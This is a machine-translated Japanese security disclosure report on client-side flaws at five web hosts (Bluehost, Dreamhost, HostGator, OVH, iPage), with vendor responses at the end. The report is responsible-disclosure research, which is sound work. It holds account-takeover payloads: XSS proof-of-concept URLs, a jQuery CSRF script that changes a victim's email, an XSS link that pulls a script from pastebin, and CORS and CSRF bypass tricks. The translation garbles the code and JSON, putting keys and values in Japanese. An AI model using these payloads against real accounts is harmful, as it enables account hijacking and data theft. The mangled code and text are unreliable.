レポート:人気のWebホスティング会社5社をテストしましたが、すべてハッキングされました

このレポートは、2019年1月に初めて発行されました


この調査の目的は、ホストされているWebサイトが Bluehost、Dreamhost、HostGator、OVH、またはiPage ワンクリックのクライアント側の脆弱性で危険にさらされる可能性があります。残念ながら、テストしたすべてのプラットフォームに少なくとも1つのクライアント側の脆弱性が見つかり、被害者がリンクをクリックするか、悪意のあるWebサイトにアクセスしたときにアカウントの乗っ取りが可能になりました.

テストしたすべてのプラットフォームは、かなりの数のユーザーを抱える人気のあるホスティングプロバイダーです。 Website Planetの目標は、読者に最も正直で有益なレビューを提供することであり、セキュリティが重要な要素です。そのため、レビューするサービスをテストするために、経験豊富なセキュリティ研究者を随時採用しています。脆弱性が見つかった場合は、ベンダーに報告して、必要な改善を行えるようにします.

この調査は、以前にさまざまなデバイスやソフトウェアの問題を明らかにした経験豊富なセキュリティ研究者、Paulos Yibeloによって行われました。.

Bluehost –複数のアカウント乗っ取りと情報漏洩の脆弱性

1. CORSの誤設定による情報漏えい

重症度:高

影響:この脆弱性により、攻撃者は盗むことができます:

  1. 名前、場所(都市、通り、州、国)、電話番号、郵便番号などの個人を特定できる情報(PII).
  2. クレジットカードの有効期限の月と年、クレジットカードの最後の4桁、クレジットカードの名前、クレジットカードの種類、および支払い方法を含む部分的な支払いの詳細.
  3. ユーザーがホストするWordPress、Mojo、SiteLock、およびOAuthでサポートされているさまざまなエンドポイントへのアクセス権を付与できるトークン.

Bluehostはcross-origin-resource-sharing(CORS)を使用して、ドメイン間でリソースを共有します。 CORSは、Same Origin Policyを緩和して、ブラウザーを介したWebサイト間の通信を可能にするメカニズムです。特定のCORS構成が危険であることは広く理解されていますが、一部の影響は簡単に誤解されます.

特定のドメインにCORSを許可するBluehostのAPIエンドポイントを確認した後、フィルターをバイパスして、どのWebサイトが何にアクセスできるようにするかを確認することを開始しました.

Webサイトは、次のHTTP応答ヘッダーを送信することでCORSを有効にできます。

Access-Control-Allow-Origin:
https://my.bluehost.com/

上記のHTTP応答がいずれかのWebサイトで見られる場合、ブラウザにhttps://my.bluehost.comにコンテンツの読み取りを許可するように指示します.

Bluehostの場合、あいまいな値を受け入れる緩い正規表現がありました。たとえば、リクエストを送信するブラウザがhttps://my.bluehost.com.evil.comからのものである場合、Bluehostは次のように応答することで許可します。

Access-Control-Allow-Origin:
https://my.bluehost.com.evil.com

ご覧のとおり、Bluehostは最初の文字列のみをチェックし、Bluehost.comの後に来るものを考慮していませんでした。これは、悪意のある攻撃者がmy.bluehost.com.EVILWEBSITE.comと呼ばれるサブドメインをホストし、BluehostがEVILWEBSITE.comにそのコンテンツの読み取りを許可することを意味します.

Bluehostをブラウジングすると、APIエンドポイントは、個人を特定できる情報から、さまざまなトークンをリークしてBluehostがホストするアカウントを乗っ取る可能性のある技術的エンドポイントまで、非常に「ジューシー」な情報を返します.

まず、/ api / usersエンドポイントに移動することにより、攻撃者はuser_idを漏えいする可能性があります。次に、攻撃者はこのuser_idを使用して、そのユーザーとそのコンテンツについてクエリを実行できます。攻撃者はまた、電子メール、姓名、ユーザーの場所などの値、およびWordPress、Mojo、SiteLock、さまざまなエンドポイントへのアクセスを許可するトークンを漏洩する可能性もあります。.

レポート:人気のある5つのWebホスティング会社をテストしましたが、すべてハッキングされました

上記を見るとわかるように、ウェブサイトのリクエストは実際にはBluehostではなくevilwebsite.comでホストされていますが、APIレスポンスではレスポンスのデータを読み取ることができます.

2.不適切なJSONリクエスト検証CSRFによるアカウント乗っ取り

重症度:やや高い

影響: この脆弱性により、攻撃者はBluehostユーザーのメールアドレスを任意のアドレスに変更し、被害者が1つのリンクをクリックするか1つのウェブサイトにアクセスしたときに被害者のアカウントに完全にアクセスできるように、新しいメールを使用してパスワードをリセットできます。.

この脆弱性は、Bluehostのリクエストの処理とリクエストの検証における特定の設定ミスが原因で悪用される可能性があります.

ユーザーが名前、電話番号、住所、メールなどの個人情報を変更しようとすると、Bluehostは次のリクエストを送信します。

レポート:人気のある5つのWebホスティング会社をテストしましたが、すべてハッキングされました

注意深く見ると、そのリクエストで送信された一意のトークンがないことがわかります。これは、どのWebサイトも実際にその特定のエンドポイントのクロスオリジンにリクエストを送信し、詳細を変更できることを意味します.

通常、これはリクエストがJSONであるため不可能です。そのようなリクエストを送信するにはAdobe Flash Playerを利用する必要がありますが、Flashが停止していることは誰でも知っています。ただし、Bluehostの場合、特別なトリックとサーバーの設定ミスにより、Flashを使用せずに、どのブラウザでも動作します。

上記のHTMLコードは、必要なものと同様のJSONリクエストを生成します{"国":"我ら","電話":"+1.NEWPHONE","通り1":"新しい通り","苗字":"苗字","Eメール":"[email protected]","市":"新着","郵便番号":"0000","州":"WA","ファーストネーム":"FirstName =”、組織":ヌル}

ブラウザは通常、入力名の最後に=(等号)を追加するため、JSONを操作して、等号をFirstNameに含め、残りの値を「value」属性に追加できます:organization “:null}

ご覧のように、リクエストはContent-Type:application / jsonではなくtext / plainで送信されますが、Bluehostはそれを気にしないため、エクスプロイトはクロスオリジンで機能します.

通常、Bluehostはリファラードメインがbluehost.comであるかどうかを確認します。リクエストが他のウェブサイトから送信された場合、Bluehostは500応答でリクエストを拒否します.

これは、メタタグでContent =” no-referrer”を使用することで簡単にバイパスできます。リファラーが送信されない場合、Bluehostがリクエストを許可するためです。.

3. CORSスキームの検証が不適切なために介在者

重症度:ミディアム

影響: この脆弱性により、ブルーホストはSSL / HTTPSトラフィックを使用してコンテンツを暗号化しているにもかかわらず、攻撃者はパブリックWi-Fiやローカルネットワーク(LAN)などの被害者のインターネットネットワーク内の被害者のブルーホスト関連トラフィックのコンテンツをプレーンテキストとして読み取ることができます。.

この脆弱性は問題#1(CORSの誤設定)に基づいています–しかし、この場合、ドメインを検証しない代わりに、Bluehostはコンテンツの読み取りを許可するときにスキーム/プロトコルを検証しません。.

レポート:人気のある5つのWebホスティング会社をテストしましたが、すべてハッキングされました

応答からわかるように、Bluehostはその内容を読み取るためにHTTPドメインを許可しています。これにより、ブラウザはHTTPドメインがそのコンテンツ(暗号化されていない)にアクセスできるようになります–このダウングレード攻撃は、BluehostによるSSL証明書の使用を完全に無意味にし、HTTPSリクエストを使用する目的全体を無効にします。.

4.アカウント乗っ取りを可能にするmy.bluehost.com上のXSS

重大度: やや高い

影響: この脆弱性により、攻撃者はbluehost.comのクライアントとしてコマンドを実行できます。これは、電子メールアドレスを含むコンテンツを変更、変更、および追加する機能を意味します。攻撃者は、被害者が悪意のあるリンクをクリックするかWebサイトにアクセスしたときに、被害者に関するコンテンツを読み取るか、Webサイトのコンテンツを変更することができます.

レポート:人気のある5つのWebホスティング会社をテストしましたが、すべてハッキングされました

2つの影響の少ない問題により、この脆弱性は非常に危険です。 1つ目は、Bluehostがメールアドレスを変更するときに現在のパスワードを必要としないことです。つまり、XSSを使用して、電子メールアドレスを変更し、パスワードをリセットするだけです。.

2つ目は、Bluehostが機密CookieにHttpOnlyフラグを設定していないことです。つまり、すべてのJavaScriptがそれらにアクセスして悪意のある攻撃者に送信し、攻撃者はこれらのCookieを使用してユーザーとして認証することができます。.

PoC:https://my.bluehost.com/cgi/dm/subdomain/redirect?domainkey=」>alert(document.d omain)

ここでビデオをチェックしてください:

Dreamhost XSSおよび情報漏えいの脆弱性

1. XSSによるアカウント乗っ取り

重症度:やや高い

影響:この脆弱性により、攻撃者は被害者がリンクまたは悪意のあるWebサイトにアクセスしたときに、被害者の電子メールまたはパスワードを簡単に変更できます。.

ペイロード:

https://panel.dreamhost.com/tree=domain.manage&current_step =インデックス&next_step = ShowAddhttp&domain =:lol」>

DreamHostはメールアドレスを変更するためにパスワードを要求しないため、これをアカウントの乗っ取りに拡張できます。したがって、攻撃者はこのXSSの脆弱性を使用してCSRF攻撃を実行するだけで、任意のアカウントを乗っ取ることができます。.

$ .ajax({
url: "https://panel.dreamhost.com/id/?tab=contact&コマンド=編集",
方法: "役職",
データ・タイプ: "html",
成功:関数(応答)
{
var security_cookie =
$(response).find("input [name = ‘security_cookie’]").val();
$ .post( "https://panel.dreamhost.com/id/?", { タブ: "連絡先",
コマンド: "submit_edit", security_cookie:security_cookie、prefix: "", 最初
: "サンタさん", 真ん中: "", 最後: "Bluh", 接尾辞: "", street1: "Nurit 103",
2丁目 : "", 市 : "オラ", 状態: "エルサレム" , zip: "90880" , 国:
"IL" , Eメール : "[email protected]",電話:"+954.8888777",ファックス: "", チャット:"",
ツイッター:"",url:""})。done(function(data){
console.log(data);
});
console.log(security_cookie);
},
エラー:関数(エラー)
{
console.log($ error);
}
});

上記のJavaScriptは、panel.dreamhost.comによって実行されると、ログインしたメールアドレスを[email protected]に変更します。これは、XSSの脆弱性を使用して行うことができます.

https://panel.dreamhost.com/tree=domain.manage¤t_step=Index&next_step = ShowAddhttp&domain =:lol%22%3E%0A%3Cscript%20async%20src =%22 // pastebin.com / raw / 65CayjA7%22%3E%3C / script%3E%0A%3Cscript%3E%20var%20x%20 =%20%22 / *

とにかく被害者が上記のリンクにアクセスすると、攻撃者にメールアドレスが変更されます.

ここでビデオをチェックしてください:

HostGatorの情報漏えいおよび複数の脆弱性

1.完全な制御を可能にするサイト全体のCSRF保護バイパス

重大度: 高い

影響: この脆弱性は、Webサイトのユーザーのアカウントセクション全体に存在します。攻撃者は、被害者がリンクをクリックするか、悪意のあるWebサイトにアクセスしたときに、被害者のプロファイルの任意の値(電子メールアドレスや個人情報を含む)を追加、編集、または変更できます.

HostGatorは通常、フォームの送信に抗CSRFトークンを使用します。ただし、POSTパラメータトークンをtoken [] =に変更して空のままにすることで、サーバーをだましてアンチCSRFトークンを無視させることができます。これにより、CSRFチェックがtrueとして渡されます。これは、疑似コードサンプルを含む、タイプジャグリングの脆弱性である可能性があります。

if(strcasecmp($ _ GET [‘token’],"$ csrf_token")== 0){

上記の関数は、特にC / C ++からWeb開発に移行した場合、ほとんどのプログラマにとって十分に見えるかもしれません。関数は文字列が同じである場合にのみtrueと評価されるように見えますが、配列が変数に渡された場合、NULL応答が返されます。 PHPの比較によると、たとえば、NULLは実際には0です。したがって、有効として渡されます!

data = changeaction&トークン[] =

彼らが持っている2番目の反CSRFトークンはリファラーベースのチェックです。彼らはリクエストがhttp://portal.hostgator.com/anythingから来たかどうかをチェックしますか? –しかし、これはウェブサイトでオープンリダイレクトを使用することで簡単に回避できます。.

2.情報漏えいとCRLFにつながる複数のCORS設定ミス

A.情報漏えい

重症度:やや高い

影響:この脆弱性により、CORSの設定ミスにより、攻撃者はHostGatorからのAPI応答を読み取ることができます。 API応答は完全な顧客とドメインの詳細で応答します.

レポート:人気のある5つのWebホスティング会社をテストしましたが、すべてハッキングされました

HostGatorからのAccess-Control-Allow-Origin応答でわかるように、それはevil.com(サンプルドメイン名)が応答コンテンツにアクセスすることを許可しています.

これは、HostGatorの応答の読み取りを許可されているドメインと一致する正規表現チェックが弱いためです。 .hostgator.comパスで終わるすべてのWebサイトを許可します。これは、http://evil.com/?null = portal.hostgator.comおよびevil.com \ @。hostgator.comのようなペイロードを送信することを意味しました。 .hostgator.comがあらゆる種類の問題を引き起こす前に、任意の文字が許可されるという事実.

B. Microsoft EdgeおよびInternet ExplorerでのCRLFインジェクション

重症度:中程度

影響:この脆弱性は、Microsoft EdgeおよびInternet Explorerを使用するHostGatorユーザーにのみ影響します。攻撃者が新しいヘッダーを挿入し、クライアント側のスクリプトを実行する可能性があります.

送信されたすべての文字は、エンコードせずにCORSヘッダー応答で返されたり、\ rのような不正な文字がないか確認したりするという事実は、Internet ExplorerおよびEdgeビューとしてのIE / Edgeユーザーに対するHTTPヘッダーインジェクションの脆弱性があることを意味します\有効なHTTPヘッダーターミネーターとしてのr(0x0d):

C. CORSスキームの検証が不適切なため、中間者

重症度:中

影響:この脆弱性により、HostGatorが適切なSSL / HTTPSトラフィックを使用していても、被害者のインターネットトラフィック(パブリックWi-Fiやローカルネットワーク(LAN)など)内の攻撃者が被害者のHostGator APIに関連付けられたトラフィックの内容をプレーンテキストとして読み取ることができます。内容を暗号化する.

#1Aのスクリーンショットにあるように、末尾が.hostgator.comの場合は、Access-Control-Allow-Originですべてが受け入れられます。これは、上のスクリーンショットにあるように、プロトコルまたはスキームも意味します。http://anything.hostgator.comでは、ローカルの攻撃者がCORSを使用してHTTPS応答を読み取ることができます。この脆弱性は、HostGatorサブドメインでホストされているXSSまたは同様の脆弱性が機能したことだけでなく、ローカルネットワーク攻撃者がCORS応答を読み取ることができることを意味します.

ここでビデオをチェックしてください:

OVH情報漏えいおよび複数の脆弱性

1. CSRF保護バイパス

重症度:高

影響:この脆弱性はWebサイト全体に存在します。認証された被害者がリンクをクリックするか、悪意のあるWebサイトにアクセスすると、攻撃者は被害者のプロファイルの任意の値(電子メールアドレスや個人情報を含む)を追加、編集、または変更できます.

OVHは2種類の抗CSRF防御を埋め込みました。 1つは、リクエストのContent-Typeが application / json 2つ目は、参照元のウェブサイトが「ovh.com」かどうかを確認することです。それでは不十分だった理由を分析してみましょう.

通常、これら2つは他のウェブサイトによって偽造することはできませんが、どちらの場合でもOVHで機能する単純なバイパスが見つかりました.

xhr.setRequestHeader( ‘Content-Type’、 ’text / plain; application / json’);

ブラウザは送信を拒否します application / json として コンテンツタイプ, ただし、 ‘text / plain; application / json’–リクエストの通過が許可されます。サーバーが確認していたのは application / json Content-Typeヘッダーに含まれています.

2番目の保護はリファラーチェックです。通常、リファラーチェックは誤解されやすく、簡単に回避できる対策です。.

OVHの場合:サーバーがチェックしたリクエストは「ovh.com」から送信されたものでしたが、スキームは関係ありませんでした。「ovh.com」のHTTPバージョンとHTTPSバージョンの両方が有効な参照元として受け入れられました。どのような種類のMITMケースでも、http://ovh.com(HTTP、攻撃者が挿入したコンテンツ)のDNSを偽装できます–被害者が閲覧すると、CSRFペイロードを使用してhttps://ovh.com(HTTPS)にリダイレクトされます。ここではHTTPスキームとHTTPSスキームの両方が許可されているため、リファラーチェックを効果的に偽装します。 (これは、OVHがHSTSを強制しないという事実によるものですが、そうすることで簡単に軽減できます)

リファラーベースのCSRF保護は一般的には役に立たないものの、あまり知られていない事実としてはブラウザーです。多くの主要なブラウザには、考慮しているセキュリティバグがあります 優先する WONTFIX これにより、ウェブサイトがリファラーを偽装できます。たとえば、Microsoft Edgeの場合、Manuel Caballeroは、ブラウザーでまだ修正されていない(そしておそらくすぐには修正されない)優れたリファラースプーフィングバグを発見しました–ユーザーが制御可能なデータを送信するブラウザーでWebサイトをリレーおよび信頼することにより、深刻な問題が発生します.

要約する:

– Google Mailの仕組みのおかげで、myemail + 2 = @ gmail.comに送信されたメールは、実際には[email protected]に送信されます。

{“ newEmail”:” [email protected]”}

「text / plain; application / jsonのContent-Typeヘッダー。HTMLフォームだけでメールを変更できます。リファラーは、ブラウザーのバグを使用して、またはMITMを使用して偽装できます.

iPageアカウントの乗っ取りと複数の脆弱性

1.アカウント乗っ取り

重症度:高

影響: この脆弱性により、被害者がリンクをクリックするかWebサイトにアクセスするだけで、攻撃者はリモートで任意のiPageアカウントを乗っ取ることができます。.

この脆弱性は、iPageのパスワードの変更ページにある奇妙な機能が原因です。 iPageはパスワードを変更するために古い/現在のパスワードを必要とせず、リクエストに関連付けられた一意のトークンはありません.

これは、どのWebサイトも、被害者のユーザー名を使用して、iPageへの新しいパスワードを使用してクロスオリジンリクエストを送信できることを意味します。.

https://www1.ipage.com/api/2.0/user/ipg.username/password

レポート:人気のある5つのWebホスティング会社をテストしましたが、すべてハッキングされました

上記のリクエストを見るとわかるように、識別子はipg.usernameであり、リファラーは送信されていません。または一意のトークン–クロスオリジンからのアカウント乗っ取りを許可しています!

2.複数のコンテンツセキュリティポリシーのバイパス

重症度:ミディアム

影響: これにより、攻撃者はiPageのAPI応答に対してクリックジャッキング攻撃を実行し、コンテンツおよびスクリプトインジェクション攻撃でCSPをバイパスできます。.

iPageはContent-Security-Policyを使用してAPIエンドポイントを保護します。悪意のあるスクリプトを実行できないように攻撃者がコンテンツを挿入するのを阻止し、特定のページにのみAPI応答エンドポイントのフレームを許可します。.

次のようになります。

Content-Security-Policy:frame-ancestors ‘self’ http://*.impress.ly http://*.dragndropbuilder.com https://*.weeblycloud.com https://*.sitelock.com https: //*.mojomarketplace.com http://*.ipage.com http://*.yourhostingaccount.com https://*.ecwid.com

X-Frame-Options:SAMEORIGIN ALLOW-FROM http://*.impress.ly http://*.dragndropbuilder.com https://*.weeblycloud.com https://*.sitelock.com https:// * .mojomarketplace.com http://*.ipage.com http://*.yourhostingaccount.com https://*.ecwid.com

ご覧のとおり、複数の主要な属性とコンポーネントが不足しています。

A.フレーム祖先での中間者攻撃

注意深く見ると、frame-ancestors属性を使用すると、複数のHTTP(暗号化されていない)ページでフレームを作成できます。これは、Wi-Fiネットワークまたは公衆インターネットのローカルの攻撃者がアドレスを偽装するHTTPドメインをホストでき、iPageがその応答をフレーム化することを許可することを意味します.

Internet Explorer 11などの一部のブラウザーはCSPをサポートしていないため、同じことを示すX-Frame-Optionsヘッダーもありますが、ご覧のとおり、これはhttp://のような同じHTTPドメインも許可します* .impress.ly、http://*.ipage.comなど.

B.属性がないために完全なバイパス

ご覧のとおり、CSPにはscript-srcまたはobject-srcタグがありません。つまり、HTMLインジェクションエンドポイントを見つけた攻撃者は、クロスサイトスクリプティング攻撃を実行できます。.

ここでビデオをチェックしてください:

余波

2019年1月15日

テストした5つのWebホストのうち、すべてが簡単にハッキングされる可能性があることがわかりました。つまり、どのホスティングサービスを使用する場合でも、ウェブサイトのセキュリティを強化するために常に追加の対策を講じる必要があります。 SEOの専門家であるIdan Ben Or氏は次のように述べています。「最大のWebホストでさえ、インフラの老朽化に悩まされており、これらのプロバイダーがカバーする600万を超えるドメインをターゲットとするバグを簡単に挿入できるということです。このため、ハッカーはなんらかの複雑な攻撃をする必要がなく、正面玄関を通り抜けることができます。」

反応

ドリームホスト 私たちの報告に最初に回答したのは、

まず、このエクスプロイトと脆弱性についてお知らせいただきありがとうございます.

責任ある開示とセキュリティの欠陥の可視化は、インターネットを誰にとっても安全な場所にするのに役立つと思います.

現在、本番環境で修正を行っており、古いpanel.dreamhost.com/id/送信フォームからCSRFを活用できないようにし、残りのエンドポイント全体でセキュリティを強化し、入力を無害化するための取り組みを行っています.

また、実行するEnduranceから次の応答を受け取りました。 Bluehost、iPage、HostGator:

共有したい脆弱性を社内で分析した後、特定した潜在的な脆弱性に対処し、パッチを適用したことをお知らせします.

また、Bluehostがプロセス中にアカウントにレッドフラグを立て、不正に閉鎖したことにも注意してください。正確な理由はありませんでした。しかし、ハッキングが完了した後に行われたため、私たちが何をしていたかを彼らが見たからだとしか考えられません。よくできました、Bluehost …でも少し遅すぎます.

ウェブサイトの安全性について詳しく知りたいですか?これらの記事をチェックしてください:

ウェブサイトのホストデータ侵害から学べる10のこと

WordPressのWebサイトがハッキングされる3つの理由+あなたのWebサイトを保護する方法

セキュリティに最適なWordPressプラグイン– Webサイトを安全に保つ

Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me

About the author

Adblock
detector